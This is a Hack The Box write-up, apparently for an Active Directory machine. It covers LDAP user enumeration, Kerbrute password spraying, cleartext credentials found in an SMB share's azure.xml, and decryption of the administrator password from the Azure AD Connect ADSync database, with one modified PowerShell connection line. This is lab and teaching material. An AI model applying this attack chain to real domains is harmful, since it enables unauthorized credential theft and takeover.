Enumeration

Nmap

Nmap scan results showed services like LDAP and Kerberos, which are commonly used in Active Directory. This indicates the target is likely a Domain Controller.

00 - nmap

SMB Shares

Initially, no SMB shares were accessible via a null session.

01 - No share is available

LDAP Anonymous

LDAP anonymous access was enabled, allowing me to enumerate and dump all available users for potential brute-force or further authentication testing.

02 - ldap anonyous is allowed

None of the enumerated users were vulnerable to AS-REP roasting.

03 - no asreproasting

Brute Force

To proceed, I created a custom password list using variations such as reversed usernames, direct usernames, and blank passwords.

04 - created passList nsr

I then used Kerbrute with the generated password list to identify valid username-password combinations.

04 - kerbrute

Exploitation

Although this user couldn’t obtain a shell, they had access to certain SMB shares, one of which contained an azure.xml file revealing the cleartext credentials for the user mhope.

05 - smb readable

06 - available users

07 - azure xml

Using the credentials from the azure.xml file, I successfully obtained a shell as the user mhope.

08 - got the user

Privilege Escalation

To escalate privileges, I performed Active Directory enumeration using BloodHound.

09 - bloodhound python

The BloodHound analysis revealed that the mhope user was a member of the Azure Admins group.

10 - sus group

At that point, I was unsure how to proceed, so I researched privilege escalation techniques related to the Azure Admins group. During this process, I came across the following blog post: https://blog.xpnsec.com/azuread-connect-for-redteam/, which provided valuable insights into exploiting Azure AD Connect for privilege escalation.

While reviewing the blog, I learned that the administrator password could be retrieved from the MSSQL ADSync database. I then checked whether I could execute SQL commands using sqlcmd and confirmed that this was possible.

11 - some sqlcmd

The blog included a script to retrieve keyset_id, instance_id, and entropy from the mms_server_configuration table, as well as private_configuration_xml and encrypted_configuration from the mms_management_agent table. These values are then used with functions from C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll to decrypt the encrypted administrator password. However, since the SQL connection in the script was configured for a remote database, I modified it to connect locally by changing this part:

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"

to this:

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Database=ADSync;Trusted_Connection=True;"

For more information about ArgumentList you can checkout this site: https://www.connectionstrings.com/sql-server/

12 - powershell

I then successfully retrieved the decrypted administrator password and used it to log in as the administrator.

13 - got the root

Pwned

The machine was fully compromised.

pwned

<
Previous Post
ServMon - Hack The Box
>
Next Post
Support - Hack The Box